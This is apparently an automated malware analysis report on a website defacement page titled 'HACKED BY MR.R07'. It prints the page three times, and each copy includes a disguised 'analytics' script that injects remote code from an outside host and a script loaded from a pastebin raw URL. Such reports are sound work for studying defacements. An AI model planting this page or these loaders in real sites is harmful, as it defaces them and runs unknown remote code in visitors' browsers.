PHP Malware Analysis
i'm_fine.htm
md5: 13a860601e84768635c552541edff131
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Title
- HACKED BY MR.R07 (Deobfuscated, HTML, Original)
URLs
- http://cache.ssend.microad.jp/js/adfunnel-sp-load.js (Deobfuscated, HTML, Original)
- http://p01.notifa.info/3fsmd3/request?id=1& (HTML)
- https://b.top4top.io/p_2010978220.gif (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=Orbitron&display=swap (Deobfuscated, HTML, Original)
- https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer& (HTML)
- https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap (Deobfuscated, Original)
- https://h.top4top.io/m_2269i7dle0.mp3 (Deobfuscated, HTML, Original)
- https://i.ibb.co/nQrdC2G/IMG-20200804-WA0032.jpg (Deobfuscated, HTML, Original)
- https://pastebin.com/raw/cJ0teRhX (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<html>
<head>
<title>HACKED BY MR.R07</title>
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/nQrdC2G/IMG-20200804-WA0032.jpg">
<link href="https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap" rel="stylesheet">
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , .R07 ' name='description'/>
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , RO7' name='keywords'/>
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , R07 ' name='Abstract'/>
<meta name="title" content="Hacked By MR.R07">
<meta name="description" content="Wh00pz!!! Your Security Gak Aman Tod!!!">
<meta name="keywords" content="Kena Hemked oleh R07">
<meta name="googlebot" content="index,follow"/>
<meta name="robots" content="all"/>
<meta name="robots schedule" content="auto"/>
<meta name="distribution" content="global"/>
<meta contact='#'/>
<style type="text/css">
body {
background-color: black;
background-size: cover;
background-attachment: fixed;
</style>
<style>
html, body {
background-color: #000
;
color: #636b6f;
font-family: 'Fredericka the Great', sans-serif;
font-weight: 100;
height: 100vh;
margin: 0;
background-repeat: no-repeat;
}
.full-height {
height: 100vh;
}
.flex-center {
align-items: center;
display: flex;
justify-content: center;
}
.position-ref {
position: relative;
}
.content {
text-align: center;
}
.title {
font-size: 36px;
padding: 20px;
}
.dcs{
font-family: 'Lacquer', sans-serif;
}
</style>
</head>
<style>@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');html { background-color: black; font-family: 'Orbitron';}body { color: white;}h1 { color: #7a00ff; }.g7 { color: #ff0000; } .btn { border: none; width: 200px; height: 30px; outline: none; color: #fff; background: #111; cursor: pointer; position: relative; font-family: Orbitron; z-index: 0; border-radius: 10px;}.btn:before { content: ''; background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000); position: absolute; top: -2px; left:-2px; background-size: 400%; z-index: -1; filter: blur(5px); width: calc(100% + 4px); height: calc(100% + 4px); animation: glowing 20s linear infinite; opacity: 0; transition: opacity .3s ease-in-out; border-radius: 10px;}.btn:active { color: #000;}.btn:active:after { background: transparent;}.btn:hover:before { opacity: 1;}.btn:after { z-index: -1; content: ''; position: absolute; width: 100%; height: 100%; background: #111; left: 0; top: 0; border-radius: 10px;}@keyframes glowing { 0% { background-position: 0 0; } 50% { background-position: 400% 0; } 100% { background-position: 0 0; }}</style>
<script>function play(){ var audio = document.getElementById("lagu"); audio.play();}function pause(){ var audio = document.getElementById("lagu"); audio.pause();}</script>
<body align="center" oncontextmenu="return false" bgcolor="black"><!-- i-mobile for SmartPhone client script -->
<script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>
<div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>
<!-- tok2_user_contents -->
<div id="tok2_user_contents">
<div class="error">
<script type="text/javascript">
</script>
<center>
</center>
<div class="flex-center position-ref full-height">
<div class="content">
<div class="text">
<img width="450" height="450" src="https://b.top4top.io/p_2010978220.gif">
<br><br><font color="white"><code><font color="red" class="dcs" size="10">HACKED BY MR.R07<br><font color="cyan" class="dcs" size="10"></font><br><br><font color="white">i'm fine :)><br></div></font><br>
</center>
<button class="btn" onclick="play()"><font size="5">Play music</font></button> <button class="btn" onclick="pause()"><font size="5">Pause music</font></button> <audio id="lagu" src="https://h.top4top.io/m_2269i7dle0.mp3"></audio><br>
<center><font color="white" size="6"><br>SAYA LEBIH SUKA MERUSAK WEBSITE SOALNYA KALO NGERUSAK KAMU AKU INGET PESAN IBU FOLLOW YOUR MOTHER'S MESSAGE WHILE THERE IS STILL :)</font></center>
</div>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXHHctAZM6QuizEICBEXBq7b7Jn2QZHfE6HjqiFWP0sJ%2bm6bzrfW%2bRxMT%2b3byL2S5n57Qwf9NHbLWa0eIcHxOz3%2fJphPPv0aMhHNNUcCgRDK5Xa4yWpzf9IC%2b124a5T5zgKO8JQyAoM3rVGpU%2fEMZjZCmI3iwaY%2bb6gt7oU7EW8NXcDpzSlxWsyLYMKAM8dfnxwIgAWqXHAW0%2bKHavOV6akkMLYNH%2b%2bwb5FWrqfiPVbl6YbB5kpnvR%2bkFRX1aJt29KqzXao9Wh10W0zguEHm%2f0fh9TZQQhKbHu0uBddCcPxU917Ln80PJw8AplK3QoPEgOVf%2fL44AA8RYyYULDWsJwS8V%2bDffai1Z1axdxIxkFJUsqHuWhYSMOqwn7wEbui6YfGRAbxD8zmKZHPr7wyQhZrZ%2b4mJg6N0chzB8qlNX2b%2bbQU7kmPgZPV0g5OUhIfbhJ8LXR%2baY55eKXVsVwni7HBHh6ZkZLHbbRc33R3AtbywnB9kFy34EyHE3GuOgGZSLKgjdf7%2bIwq0a4Cr%2btlPV3mPEVG%2bKp%2bYnzwru8Lr65nXcUlnx83zHNLY5h8d7S426LuV%2fcit25Ni4KPOhy%2bTXiYgA9Q58KhQ8uZRJPWCEGrWYUPizJ%2fKBAug%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</html>
<script type=<script type="text/javascript" src="https://pastebin.com/raw/cJ0teRhX"></script></td>Execution traces
Generated HTML code
<html><head>
<title>HACKED BY MR.R07</title>
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/nQrdC2G/IMG-20200804-WA0032.jpg">
<link href="https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap" rel="stylesheet">
<meta content="Owned , Pwndz , Massed , Stamped , Shoot , .R07 " name="description">
<meta content="Owned , Pwndz , Massed , Stamped , Shoot , RO7" name="keywords">
<meta content="Owned , Pwndz , Massed , Stamped , Shoot , R07 " name="Abstract">
<meta name="title" content="Hacked By MR.R07">
<meta name="description" content="Wh00pz!!! Your Security Gak Aman Tod!!!">
<meta name="keywords" content="Kena Hemked oleh R07">
<meta name="googlebot" content="index,follow">
<meta name="robots" content="all">
<meta name="robots schedule" content="auto">
<meta name="distribution" content="global">
<meta contact="#">
<style type="text/css">
body {
background-color: black;
background-size: cover;
background-attachment: fixed;
</style>
<style>
html, body {
background-color: #000
;
color: #636b6f;
font-family: 'Fredericka the Great', sans-serif;
font-weight: 100;
height: 100vh;
margin: 0;
background-repeat: no-repeat;
}
.full-height {
height: 100vh;
}
.flex-center {
align-items: center;
display: flex;
justify-content: center;
}
.position-ref {
position: relative;
}
.content {
text-align: center;
}
.title {
font-size: 36px;
padding: 20px;
}
.dcs{
font-family: 'Lacquer', sans-serif;
}
</style>
<style>@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');html { background-color: black; font-family: 'Orbitron';}body { color: white;}h1 { color: #7a00ff; }.g7 { color: #ff0000; } .btn { border: none; width: 200px; height: 30px; outline: none; color: #fff; background: #111; cursor: pointer; position: relative; font-family: Orbitron; z-index: 0; border-radius: 10px;}.btn:before { content: ''; background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000); position: absolute; top: -2px; left:-2px; background-size: 400%; z-index: -1; filter: blur(5px); width: calc(100% + 4px); height: calc(100% + 4px); animation: glowing 20s linear infinite; opacity: 0; transition: opacity .3s ease-in-out; border-radius: 10px;}.btn:active { color: #000;}.btn:active:after { background: transparent;}.btn:hover:before { opacity: 1;}.btn:after { z-index: -1; content: ''; position: absolute; width: 100%; height: 100%; background: #111; left: 0; top: 0; border-radius: 10px;}@keyframes glowing { 0% { background-position: 0 0; } 50% { background-position: 400% 0; } 100% { background-position: 0 0; }}</style><script>function play(){ var audio = document.getElementById("lagu"); audio.play();}function pause(){ var audio = document.getElementById("lagu"); audio.pause();}</script><script type="text/javascript" async="" src="http://p01.notifa.info/3fsmd3/request?id=1&enc=9UwkxLgY9&params=4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXHHctAZM6QuizEICBEXBq7b7Jn2QZHfE6HjqiFWP0sJ%2bm6bzrfW%2bRxMT%2b3byL2S5n57Qwf9NHbLWa0eIcHxOz3%2fJphPPv0aMhHNNUcCgRDK5Xa4yWpzf9IC%2b124a5T5zgKO8JQyAoM3rVGpU%2fEMZjZCmI3iwaY%2bb6gt7oU7EW8NXcDpzSlxWsyLYMKAM8dfnxwIgAWqXHAW0%2bKHavOV6akkMLYNH%2b%2bwb5FWrqfiPVbl6YbB5kpnvR%2bkFRX1aJt29KqzXao9Wh10W0zguEHm%2f0fh9TZQQhKbHu0uBddCcPxU917Ln80PJw8AplK3QoPEgOVf%2fL44AA8RYyYULDWsJwS8V%2bDffai1Z1axdxIxkFJUsqHuWhYSMOqwn7wEbui6YfGRAbxD8zmKZHPr7wyQhZrZ%2b4mJg6N0chzB8qlNX2b%2bbQU7kmPgZPV0g5OUhIfbhJ8LXR%2baY55eKXVsVwni7HBHh6ZkZLHbbRc33R3AtbywnB9kFy34EyHE3GuOgGZSLKgjdf7%2bIwq0a4Cr%2btlPV3mPEVG%2bKp%2bYnzwru8Lr65nXcUlnx83zHNLY5h8d7S426LuV%2fcit25Ni4KPOhy%2bTXiYgA9Q58KhQ8uZRJPWCEGrWYUPizJ%2fKBAug%3d%3d&idc_r=27161296423&domain=localhost&sw=1920&sh=1080"></script></head>
<body align="center" oncontextmenu="return false" bgcolor="black"><!-- i-mobile for SmartPhone client script -->
<script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>
<div class="adfunnel_sp" data-adfunnel="{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }"></div>
<!-- tok2_user_contents -->
<div id="tok2_user_contents">
<div class="error">
<script type="text/javascript">
</script>
<center>
</center>
<div class="flex-center position-ref full-height">
<div class="content">
<div class="text">
<img width="450" height="450" src="https://b.top4top.io/p_2010978220.gif">
<br><br><font color="white"><code><font color="red" class="dcs" size="10">HACKED BY MR.R07<br><font color="cyan" class="dcs" size="10"></font><br><br><font color="white">i'm fine :)><br></font></font></code></font></div><font color="white"><code><font color="red" class="dcs" size="10"><br>
<button class="btn" onclick="play()"><font size="5">Play music</font></button> <button class="btn" onclick="pause()"><font size="5">Pause music</font></button> <audio id="lagu" src="https://h.top4top.io/m_2269i7dle0.mp3"></audio><br>
<center><font color="white" size="6"><br>SAYA LEBIH SUKA MERUSAK WEBSITE SOALNYA KALO NGERUSAK KAMU AKU INGET PESAN IBU FOLLOW YOUR MOTHER'S MESSAGE WHILE THERE IS STILL :)</font></center>
</font></code></font></div><font color="white"><code><font color="red" class="dcs" size="10">
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXHHctAZM6QuizEICBEXBq7b7Jn2QZHfE6HjqiFWP0sJ%2bm6bzrfW%2bRxMT%2b3byL2S5n57Qwf9NHbLWa0eIcHxOz3%2fJphPPv0aMhHNNUcCgRDK5Xa4yWpzf9IC%2b124a5T5zgKO8JQyAoM3rVGpU%2fEMZjZCmI3iwaY%2bb6gt7oU7EW8NXcDpzSlxWsyLYMKAM8dfnxwIgAWqXHAW0%2bKHavOV6akkMLYNH%2b%2bwb5FWrqfiPVbl6YbB5kpnvR%2bkFRX1aJt29KqzXao9Wh10W0zguEHm%2f0fh9TZQQhKbHu0uBddCcPxU917Ln80PJw8AplK3QoPEgOVf%2fL44AA8RYyYULDWsJwS8V%2bDffai1Z1axdxIxkFJUsqHuWhYSMOqwn7wEbui6YfGRAbxD8zmKZHPr7wyQhZrZ%2b4mJg6N0chzB8qlNX2b%2bbQU7kmPgZPV0g5OUhIfbhJ8LXR%2baY55eKXVsVwni7HBHh6ZkZLHbbRc33R3AtbywnB9kFy34EyHE3GuOgGZSLKgjdf7%2bIwq0a4Cr%2btlPV3mPEVG%2bKp%2bYnzwru8Lr65nXcUlnx83zHNLY5h8d7S426LuV%2fcit25Ni4KPOhy%2bTXiYgA9Q58KhQ8uZRJPWCEGrWYUPizJ%2fKBAug%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
<script type="<script" src="https://pastebin.com/raw/cJ0teRhX"></script></font></code></font></div></div></div></body></html>Original PHP code
<html>
<head>
<title>HACKED BY MR.R07</title>
<link rel="icon" type="image/x-icon" href="https://i.ibb.co/nQrdC2G/IMG-20200804-WA0032.jpg">
<link href="https://fonts.googleapis.com/css?family=Saira+Stencil+One|Lacquer&display=swap" rel="stylesheet">
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , .R07 ' name='description'/>
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , RO7' name='keywords'/>
<meta content='Owned , Pwndz , Massed , Stamped , Shoot , R07 ' name='Abstract'/>
<meta name="title" content="Hacked By MR.R07">
<meta name="description" content="Wh00pz!!! Your Security Gak Aman Tod!!!">
<meta name="keywords" content="Kena Hemked oleh R07">
<meta name="googlebot" content="index,follow"/>
<meta name="robots" content="all"/>
<meta name="robots schedule" content="auto"/>
<meta name="distribution" content="global"/>
<meta contact='#'/>
<style type="text/css">
body {
background-color: black;
background-size: cover;
background-attachment: fixed;
</style>
<style>
html, body {
background-color: #000
;
color: #636b6f;
font-family: 'Fredericka the Great', sans-serif;
font-weight: 100;
height: 100vh;
margin: 0;
background-repeat: no-repeat;
}
.full-height {
height: 100vh;
}
.flex-center {
align-items: center;
display: flex;
justify-content: center;
}
.position-ref {
position: relative;
}
.content {
text-align: center;
}
.title {
font-size: 36px;
padding: 20px;
}
.dcs{
font-family: 'Lacquer', sans-serif;
}
</style>
</head>
<style>@import url('https://fonts.googleapis.com/css?family=Orbitron&display=swap');html { background-color: black; font-family: 'Orbitron';}body { color: white;}h1 { color: #7a00ff; }.g7 { color: #ff0000; } .btn { border: none; width: 200px; height: 30px; outline: none; color: #fff; background: #111; cursor: pointer; position: relative; font-family: Orbitron; z-index: 0; border-radius: 10px;}.btn:before { content: ''; background: linear-gradient(45deg, #ff0000, #002bff, #7a00ff, #ff00c8, #ff0000); position: absolute; top: -2px; left:-2px; background-size: 400%; z-index: -1; filter: blur(5px); width: calc(100% + 4px); height: calc(100% + 4px); animation: glowing 20s linear infinite; opacity: 0; transition: opacity .3s ease-in-out; border-radius: 10px;}.btn:active { color: #000;}.btn:active:after { background: transparent;}.btn:hover:before { opacity: 1;}.btn:after { z-index: -1; content: ''; position: absolute; width: 100%; height: 100%; background: #111; left: 0; top: 0; border-radius: 10px;}@keyframes glowing { 0% { background-position: 0 0; } 50% { background-position: 400% 0; } 100% { background-position: 0 0; }}</style>
<script>function play(){ var audio = document.getElementById("lagu"); audio.play();}function pause(){ var audio = document.getElementById("lagu"); audio.pause();}</script>
<body align="center" oncontextmenu="return false" bgcolor="black"><!-- i-mobile for SmartPhone client script -->
<script type="text/javascript" charset="UTF-8" src="http://cache.ssend.microad.jp/js/adfunnel-sp-load.js"></script>
<div class="adfunnel_sp" data-adfunnel='{ "spotid":"ad7990ad7d02f589", "seq":1,"display":"overlay" }'></div>
<!-- tok2_user_contents -->
<div id="tok2_user_contents">
<div class="error">
<script type="text/javascript">
</script>
<center>
</center>
<div class="flex-center position-ref full-height">
<div class="content">
<div class="text">
<img width="450" height="450" src="https://b.top4top.io/p_2010978220.gif">
<br><br><font color="white"><code><font color="red" class="dcs" size="10">HACKED BY MR.R07<br><font color="cyan" class="dcs" size="10"></font><br><br><font color="white">i'm fine :)><br></div></font><br>
</center>
<button class="btn" onclick="play()"><font size="5">Play music</font></button> <button class="btn" onclick="pause()"><font size="5">Pause music</font></button> <audio id="lagu" src="https://h.top4top.io/m_2269i7dle0.mp3"></audio><br>
<center><font color="white" size="6"><br>SAYA LEBIH SUKA MERUSAK WEBSITE SOALNYA KALO NGERUSAK KAMU AKU INGET PESAN IBU FOLLOW YOUR MOTHER'S MESSAGE WHILE THERE IS STILL :)</font></center>
</div>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXHHctAZM6QuizEICBEXBq7b7Jn2QZHfE6HjqiFWP0sJ%2bm6bzrfW%2bRxMT%2b3byL2S5n57Qwf9NHbLWa0eIcHxOz3%2fJphPPv0aMhHNNUcCgRDK5Xa4yWpzf9IC%2b124a5T5zgKO8JQyAoM3rVGpU%2fEMZjZCmI3iwaY%2bb6gt7oU7EW8NXcDpzSlxWsyLYMKAM8dfnxwIgAWqXHAW0%2bKHavOV6akkMLYNH%2b%2bwb5FWrqfiPVbl6YbB5kpnvR%2bkFRX1aJt29KqzXao9Wh10W0zguEHm%2f0fh9TZQQhKbHu0uBddCcPxU917Ln80PJw8AplK3QoPEgOVf%2fL44AA8RYyYULDWsJwS8V%2bDffai1Z1axdxIxkFJUsqHuWhYSMOqwn7wEbui6YfGRAbxD8zmKZHPr7wyQhZrZ%2b4mJg6N0chzB8qlNX2b%2bbQU7kmPgZPV0g5OUhIfbhJ8LXR%2baY55eKXVsVwni7HBHh6ZkZLHbbRc33R3AtbywnB9kFy34EyHE3GuOgGZSLKgjdf7%2bIwq0a4Cr%2btlPV3mPEVG%2bKp%2bYnzwru8Lr65nXcUlnx83zHNLY5h8d7S426LuV%2fcit25Ni4KPOhy%2bTXiYgA9Q58KhQ8uZRJPWCEGrWYUPizJ%2fKBAug%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>
</html>
<script type=<script type="text/javascript" src="https://pastebin.com/raw/cJ0teRhX"></script></td>